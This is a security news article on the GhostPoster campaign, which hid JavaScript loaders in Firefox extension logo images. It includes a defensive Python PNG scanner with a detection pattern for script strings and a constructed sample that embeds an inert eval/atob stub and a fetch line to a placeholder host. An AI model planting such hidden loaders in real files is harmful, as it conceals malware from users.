Hidden in Plain Sight: How the GhostPoster Campaign Injected Malware Into 50,000 Firefox Users
Researchers at Koi Security have identified a new malicious campaign dubbed GhostPoster, targeting users of the Firefox browser. As part of the operation, attackers distributed extensions that appeared harmless and even amassed tens of thousands of installations, yet concealed a latent threat. The campaign’s most unusual feature lies in its method of concealment: the malicious code was embedded directly within the graphical logo files of the add-ons.
At least seventeen extensions were involved. In every case, the PNG logo served as a container for JavaScript code injected through steganography. This code functioned as a loader, granting persistent, elevated access to the browser. Once activated, it enabled the hijacking of affiliate links, the injection of third-party analytics, and participation in advertising abuse and click fraud schemes.
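As an added illustration, not Koi Security's tooling or the campaign's real embedding code, the following Python scanner is the kind of check a reviewer can run over an extension's icon files: it flags bytes appended after the IEND chunk, chunk types outside the standard set, and script-like strings inside chunk data. Both sample images and the loader stub are constructed here; steganography that hides data in pixel values would need a statistical test this heuristic does not attempt.

```python
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
KNOWN = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP", b"sBIT", b"sRGB",
         b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs", b"sPLT", b"tIME", b"eXIf"}
# Strings rarely found in genuine image metadata but typical of JavaScript loader stubs.
JS_HINT = re.compile(rb"function\s*\(|eval\(|new Function|atob\(|fetch\(|XMLHttpRequest")

def chunk(ctype, payload):
    """Encode one PNG chunk: 4-byte big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def parse_png(data):
    """Walk the chunk list; return ([(type, payload), ...], bytes found after IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    chunks, pos = [], len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunks.append((ctype, data[pos + 8:pos + 8 + length]))
        pos += 12 + length  # skip length, type, data and CRC
        if ctype == b"IEND":  # anything past IEND is not part of the image
            break
    return chunks, data[pos:]

def scan_png(data):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    chunks, trailing = parse_png(data)
    findings = []
    for ctype, payload in chunks:
        if ctype not in KNOWN:
            findings.append("nonstandard-chunk:" + ctype.decode("latin-1"))
        if JS_HINT.search(payload):  # script text inside metadata or raw chunk data
            findings.append("script-like-data:" + ctype.decode("latin-1"))
    if trailing:
        findings.append("trailing-bytes:%d" % len(trailing))
        if JS_HINT.search(trailing):
            findings.append("script-like-data:trailing")
    return findings

# Constructed samples: a valid 1x1 RGB image, and the same image with a loader stub
# hidden in a tEXt chunk plus extra bytes appended after IEND (placeholder domain).
IHDR = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit depth, RGB
IDAT = zlib.compress(b"\x00\xff\x00\x00")  # filter byte + one red pixel
CLEAN_PNG = PNG_SIG + chunk(b"IHDR", IHDR) + chunk(b"IDAT", IDAT) + chunk(b"IEND", b"")
STUB = b"Comment\x00(function(){eval(atob('Li4u'))})()"
SUSPICIOUS_PNG = (PNG_SIG + chunk(b"IHDR", IHDR) + chunk(b"tEXt", STUB) + chunk(b"IDAT", IDAT)
                  + chunk(b"IEND", b"") + b"fetch('https://loader.example.invalid');")
```

Run `scan_png` over every image shipped in an extension package; a clean icon returns an empty list, while the constructed sample above reports the tEXt stub and the trailing bytes.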
To evade detection, the loader remained dormant most of the time, contacting a remote server in only one out of ten executions. It also delayed activation until forty-eight hours after installation. The primary payload was fetched from a predefined domain, with a fallback address used in case of failure. The retrieved code underwent multiple layers of processing—obfuscation, Base64 decoding, and additional encryption using a key tied to the extension’s identifier.
Although the delivery chains varied, all identified extensions exhibited similar behavior and communicated with the same command-and-control infrastructure. Compromised add-ons spanned several popular categories, including VPN services, translation tools, weather widgets, and utilities for working with web pages.
The final malicious module did not steal passwords or redirect users to phishing sites, but it significantly eroded privacy. It injected hidden advertising frames, stripped protective HTTP headers, bypassed CAPTCHA mechanisms, and added tracking of visited pages.
According to Koi Security, the delivery mechanism employed by GhostPoster makes the campaign particularly dangerous, as operators could at any moment swap the payload for something far more destructive. Users who installed the affected extensions are advised to remove them immediately and change passwords for critical accounts.
At the time of publication, several of the malicious add-ons remained available in the Firefox Add-ons catalog. Mozilla was notified of the issue but had not yet responded publicly.